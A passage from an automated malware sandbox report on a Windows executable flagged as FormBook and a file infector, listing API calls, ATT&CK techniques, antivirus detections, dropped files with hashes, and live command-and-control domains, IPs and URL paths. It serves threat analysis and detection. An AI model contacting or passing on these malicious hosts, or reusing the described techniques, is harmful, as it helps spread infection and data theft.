          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: LiuUGJK9vH.exeBinary or memory string: WIN_81
          Source: LiuUGJK9vH.exeBinary or memory string: WIN_XP
          Source: LiuUGJK9vH.exeBinary or memory string: WIN_XPe
          Source: LiuUGJK9vH.exeBinary or memory string: WIN_VISTA
          Source: LiuUGJK9vH.exeBinary or memory string: WIN_7
          Source: LiuUGJK9vH.exeBinary or memory string: WIN_8
          Source: LiuUGJK9vH.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          LSASS Driver          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		1
          Taint Shared Content          		1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Service Execution          		1
          DLL Side-Loading          		1
          LSASS Driver          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt2
          Valid Accounts          		1
          DLL Side-Loading          		3
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron1
          Windows Service          		2
          Valid Accounts          		1
          Software Packing          		NTDS125
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
          Access Token Manipulation          		1
          Timestomp          		LSA Secrets151
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Windows Service          		1
          DLL Side-Loading          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items212
          Process Injection          		221
          Masquerading          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Valid Accounts          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Access Token Manipulation          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          LiuUGJK9vH.exe92%ReversingLabsWin32.Virus.Expiro
          LiuUGJK9vH.exe100%AviraW32/Infector.Gen
          LiuUGJK9vH.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%Joe Sandbox ML
          C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
          C:\Windows\System32\alg.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://18.141.10.107:80/rai0%Avira URL Cloudsafe
          http://54.244.188.177/100%Avira URL Cloudmalware
          http://54.244.188.177/hdjf~A100%Avira URL Cloudmalware
          http://54.244.188.177/hdjf100%Avira URL Cloudmalware
          http://18.141.10.107/80%Avira URL Cloudsafe
          http://18.141.10.107/raie0%Avira URL Cloudsafe
          http://18.141.10.107/x0%Avira URL Cloudsafe
          http://18.141.10.107/raiI0%Avira URL Cloudsafe
          http://18.141.10.107/rai0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ssbzmoy.biz
          		18.141.10.107
          		truefalse
            		high
            pywolwnvd.biz
            		54.244.188.177
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://ssbzmoy.biz/raifalse
                		high
                http://pywolwnvd.biz/hdjffalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://54.244.188.177/hdjf~ALiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://18.141.10.107/raieLiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://18.141.10.107/8LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://18.141.10.107/xLiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://18.141.10.107/raiLiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://54.244.188.177/LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://54.244.188.177/hdjfLiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://18.141.10.107/LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://18.141.10.107/raiILiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://18.141.10.107:80/raiLiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    54.244.188.177
                    		pywolwnvd.bizUnited States
                    		16509AMAZON-02USfalse
                    18.141.10.107
                    		ssbzmoy.bizUnited States
                    		16509AMAZON-02USfalse

                    General Information

                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1588299
                    Start date and time:2025-01-10 23:39:52 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 0s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:3
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:LiuUGJK9vH.exe
                    renamed because original name is a hash value
                    Original Sample Name:1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2.exe
                    Detection:MAL
                    Classification:mal100.spre.troj.evad.winEXE@6/10@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 73
                    • Number of non-executed functions: 246
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • VT rate limit hit for: LiuUGJK9vH.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:40:53API Interceptor1x Sleep call for process: LiuUGJK9vH.exe modified
                    17:41:22API Interceptor3x Sleep call for process: svchost.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    54.244.188.177UaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                    • pywolwnvd.biz/rhimsaly
                    SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                    • cvgrf.biz/kmpia
                    I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                    • lrxdmhrr.biz/rwlfutjcp
                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                    • pywolwnvd.biz/wlyolqts
                    RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                    • lrxdmhrr.biz/tbbwyfgx
                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                    • lrxdmhrr.biz/fncvigkebkn
                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                    • cvgrf.biz/dy
                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                    • cvgrf.biz/ubwy
                    INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                    • cvgrf.biz/mddjrljmh
                    Shipment Notification.exeGet hashmaliciousFormBookBrowse
                    • cvgrf.biz/pm
                    18.141.10.107SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                    • knjghuig.biz/wmfptllh
                    I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                    • warkcdu.biz/gloumaahxxajxf
                    RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                    • warkcdu.biz/d
                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                    • vcddkls.biz/we
                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                    • vcddkls.biz/kknpblsbxdrrjko
                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                    • knjghuig.biz/nfm
                    INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                    • vcddkls.biz/x
                    Shipment Notification.exeGet hashmaliciousFormBookBrowse
                    • knjghuig.biz/hsyjdjsftfdjf
                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                    • vcddkls.biz/lqpvpf
                    Request for Quotation.exeGet hashmaliciousFormBookBrowse
                    • vcddkls.biz/ytpebbldheutao

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ssbzmoy.bizUaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                    • 18.141.10.107
                    SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                    • 18.141.10.107
                    I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                    • 18.141.10.107
                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                    • 18.141.10.107
                    RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                    • 18.141.10.107
                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                    • 18.141.10.107
                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                    • 18.141.10.107
                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                    • 18.141.10.107
                    INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                    • 18.141.10.107
                    Shipment Notification.exeGet hashmaliciousFormBookBrowse
                    • 18.141.10.107
                    pywolwnvd.bizUaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                    • 54.244.188.177
                    SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                    • 54.244.188.177
                    I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                    • 54.244.188.177
                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                    • 54.244.188.177
                    RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                    • 54.244.188.177
                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                    • 54.244.188.177
                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                    • 54.244.188.177
                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                    • 54.244.188.177
                    INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                    • 54.244.188.177
                    Shipment Notification.exeGet hashmaliciousFormBookBrowse
                    • 54.244.188.177

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    AMAZON-02US5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                    • 13.228.81.39
                    gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                    • 13.248.169.48
                    UaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                    • 54.244.188.177
                    0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                    • 18.139.62.226
                    https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                    • 3.120.85.61
                    SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                    • 18.141.10.107
                    fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                    • 13.248.169.48
                    NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                    • 18.139.62.226
                    I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                    • 18.141.10.107
                    statement.docGet hashmaliciousKnowBe4Browse
                    • 52.217.123.201
                    AMAZON-02US5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                    • 13.228.81.39
                    gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                    • 13.248.169.48
                    UaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                    • 54.244.188.177
                    0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                    • 18.139.62.226
                    https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                    • 3.120.85.61
                    SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                    • 18.141.10.107
                    fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                    • 13.248.169.48
                    NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                    • 18.139.62.226
                    I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                    • 18.141.10.107
                    statement.docGet hashmaliciousKnowBe4Browse
                    • 52.217.123.201

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1658880
                    Entropy (8bit):4.312990393887855
                    Encrypted:false
                    SSDEEP:24576:JxGBcml8Vg9N9JMlDlfjRiVuVsWt5MJMs:vGy+cgFIDRRAubt5M
                    MD5:1E28FD404AAE9396AA5D6A1141873E0E
                    SHA1:1C46C05FB4E4792F1363F82274A529083BE024BB
                    SHA-256:DD219EE79A5A8FD649127D90243C3631C275BFE581C85D8F6775B2427F66F38A
                    SHA-512:D3580EBBA7B815E1D2B0677399D254B85C2FE23E79DBCBD2D27E4C58D54EC2981FC53930FA9FA71F79E2614040B4C705AE468D20ADBF3EF672AADC46C2104119
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\Thebit

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.996029064087877
                    Encrypted:true
                    SSDEEP:3072:9PvhbrrJ394XuFfmGOZrfsDjmkJ9uGaVKPkmig2C3+11IcEjIXfvnn4wb3xwTNqM:9d539dhIC59uxZH1gIXH4o2A3zGoG
                    MD5:2E632CF2FD60FCFDA595613C1DDA8C83
                    SHA1:4B341A13918BF2390C6FB4E50C9C66563484793E
                    SHA-256:808E1F6C73AE2292BD8F99298F685B1A07E601892E6278397E36F97A9CEFCAFB
                    SHA-512:D1410B18EC235230BAC3A7FBE6D2ED9F74A6755F4BAE170E4F534C27AFEAD2A752D50E29C289BF7E599B0E11F3D4B2FDCBF08BB7221A4BEEEF488DC9A47D6A9B
                    Malicious:false
                    Reputation:low
                    Preview:...E4ROQMPNL..06.NSBTWCC.GHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNL.106HQ.LT.J.u.I..s.9 #n<+^WD'#s!59-, g* . :?i9 l.~c.+!7'zZNIpGHE7ROQ0QG.dQW.{.4.i7$.N...2(.S..eQW.\...h7$...+-.2(.IPNLY106..SB.VBC..m.7ROQIPNL.127MOXBT.GCTGHE7ROQIENLY!06F>WBTW.CTWHE7POQOPNLY106@NSBTWCCT7LE7POQIPNL[1p.FNCBTGCCTGXE7BOQIPNLI106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCz3-=CROQ..JLY!06F.WBTGCCTGHE7ROQIPNLy10VFNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106

                    C:\Users\user\AppData\Local\Temp\autC621.tmp

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.996029064087877
                    Encrypted:true
                    SSDEEP:3072:9PvhbrrJ394XuFfmGOZrfsDjmkJ9uGaVKPkmig2C3+11IcEjIXfvnn4wb3xwTNqM:9d539dhIC59uxZH1gIXH4o2A3zGoG
                    MD5:2E632CF2FD60FCFDA595613C1DDA8C83
                    SHA1:4B341A13918BF2390C6FB4E50C9C66563484793E
                    SHA-256:808E1F6C73AE2292BD8F99298F685B1A07E601892E6278397E36F97A9CEFCAFB
                    SHA-512:D1410B18EC235230BAC3A7FBE6D2ED9F74A6755F4BAE170E4F534C27AFEAD2A752D50E29C289BF7E599B0E11F3D4B2FDCBF08BB7221A4BEEEF488DC9A47D6A9B
                    Malicious:false
                    Reputation:low
                    Preview:...E4ROQMPNL..06.NSBTWCC.GHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNL.106HQ.LT.J.u.I..s.9 #n<+^WD'#s!59-, g* . :?i9 l.~c.+!7'zZNIpGHE7ROQ0QG.dQW.{.4.i7$.N...2(.S..eQW.\...h7$...+-.2(.IPNLY106..SB.VBC..m.7ROQIPNL.127MOXBT.GCTGHE7ROQIENLY!06F>WBTW.CTWHE7POQOPNLY106@NSBTWCCT7LE7POQIPNL[1p.FNCBTGCCTGXE7BOQIPNLI106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCz3-=CROQ..JLY!06F.WBTGCCTGHE7ROQIPNLy10VFNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106

                    C:\Users\user\AppData\Local\Temp\autC671.tmp

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14596
                    Entropy (8bit):7.634261998230472
                    Encrypted:false
                    SSDEEP:384:dTYznwMNeAOPPYLDfvWME/eTk5mUOYHvqmUoiGwfycSV:dAwJV8DfvWkOLHBiGw5C
                    MD5:EA210CBB3DB8B138FB96C70BFA3F2452
                    SHA1:5A9BF057A5CBB0B7A5E59F9B6B139166A38ACE52
                    SHA-256:2C964FC828D78F33A0C823FBD610B1BCF74C801A09EDE5E82EEC0572928C423E
                    SHA-512:22CDFF953B0732A8855550D2355880EF838844EA47D151149FB462CAC8388AA5B94C8395FF3DB639BE6FA6725FB1F91A156782BCC904E1655E1B878314021F7A
                    Malicious:false
                    Reputation:low
                    Preview:EA06..0..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                    C:\Users\user\AppData\Local\Temp\teer

                    Download File
                    Process:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):143378
                    Entropy (8bit):2.792495449492762
                    Encrypted:false
                    SSDEEP:192:mNxyGyDZFuil7LDZGMMVQc3GkcVoudfSq5+vLkHVoqW4/qb35mwBgZihJahYDt0m:Y
                    MD5:5EEC4E88617FFE9EBD1D4051C4E3DBDE
                    SHA1:8FB94D41B8C241F186297A595E94C68CAACB9460
                    SHA-256:658153BEC837A54A63CA3F65082A60455C0C58CFD891BECB00467E306F26748C
                    SHA-512:EEBC8B2326C141B8B4B2C02EBCB64D38357E29F903399974795363D5C0FBCA22B36DB81068B2D5DD2CEA9DB46209D96AFEB5E09592728CE62E0783377944A879
                    Malicious:false
                    Reputation:low
